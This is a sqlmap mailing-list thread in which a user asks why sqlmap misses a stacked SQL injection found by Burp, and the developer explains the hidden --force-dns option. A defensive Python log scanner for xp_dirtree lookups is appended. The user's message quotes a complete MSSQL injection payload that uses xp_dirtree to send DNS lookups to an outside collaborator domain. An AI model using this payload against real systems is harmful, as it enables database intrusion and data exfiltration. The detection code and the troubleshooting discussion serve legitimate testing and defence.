I would suggest that you run Wireshark or similar when running with
--dns-domain to properly debug what is going on. There could be really a lot
of problems before you fine-tune it (e.g. another service running on :53).

About "forcing" sqlmap to use dns-exfil: it will always at least try
to test it at the start of a run (if another injection technique is
available). Also, it will prefer other "faster" techniques (ERROR and UNION)
over dns-exfil. However, there is a hidden switch "--force-dns" which will
force the usage of dns-exfil even if ERROR/UNION are available.

As said, the best advice I can give you is to run Wireshark during
the run and really see what is going on.

Bye

On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:

> I have a situation where Burp has detected the following DNS exfiltration
> injection for a query parameter in a web app:
>
>
> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>
>
> To make that a little easier to read, the injected value is:
>
>
> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>
>
> I've modified the domain and verified that I receive the DNS requests on
> my local DNS server (the domain which I provide to sqlmap using the
> --dns-domain=xxx option) when the injection is manually sent to the page.
> The problem is, when I pass the request to sqlmap it's not detecting that
> there's an injection at all.  I've provided the OS/DBMS and --level 5, but
> still no dice.  I'm using sqlmap v1.0.12#stable.
>
>
> Since I've gotten many other injections to work in the past, I believe
> that I'm using sqlmap properly (formatting my request in a file
> appropriately, specifying the correct parameter to test, etc.)  However, it
> surprised me that what appeared to be a fairly straight-forward stacked SQL
> injection would slip by all of sqlmap's tests. Is there a way to force
> sqlmap to try DNS exfiltration injections despite no other injection
> technique succeeding?
>
>
> Thanks
>
> V
>
>
>
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
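
For the defender's side of the request quoted in this thread, an added example (not part of the original messages and not sqlmap code): it scans web-server request targets for a stacked `xp_dirtree` call and recovers the UNC hostname the database would resolve, including when the string literal is split with `'+'` as in the Burp request. The log entries, hostnames and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed request targets as they would appear in an access log.
# Hostnames are placeholders, not values from the thread.
SAMPLE_REQUESTS = [
    "/Store/Page.aspx?ProductCategory=45",
    "/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d"
    "'\\\\abc123.collab'%2b'example.test\\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20",
    "/Store/Page.aspx?ProductCategory=7%3bEXEC%20xp_dirtree%20'\\\\h1.example.test\\x'",
]

# EXEC [master.dbo.|master..]xp_dirtree, case-insensitive.
PROC = re.compile(r"\bexec(?:ute)?\s+(?:master\.(?:dbo)?\.)?xp_dirtree\b", re.I)
# T-SQL literal concatenation: 'foo'+'bar' is the same string as 'foobar'.
CONCAT = re.compile(r"'\s*\+\s*'")
# Start of a UNC path inside a string literal: '\\host\share
UNC = re.compile(r"'\\\\([A-Za-z0-9._-]+)\\")


def find_unc_lookups(request_target):
    """Return UNC hostnames in a query string that also calls xp_dirtree."""
    query = unquote_plus(urlsplit(request_target).query)
    if not PROC.search(query):
        return []
    # Rejoin split literals first, otherwise the hostname is seen only in part.
    joined = CONCAT.sub("", query)
    return UNC.findall(joined)


def scan(request_targets):
    """Return (target, hostnames) for every request that triggers a lookup."""
    hits = []
    for target in request_targets:
        hosts = find_unc_lookups(target)
        if hosts:
            hits.append((target, hosts))
    return hits


if __name__ == "__main__":
    for target, hosts in scan(SAMPLE_REQUESTS):
        print(", ".join(hosts), "<-", target[:60])
```

The recovered hostnames can be compared against DNS resolver logs for the database server to confirm whether a lookup actually left the network.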
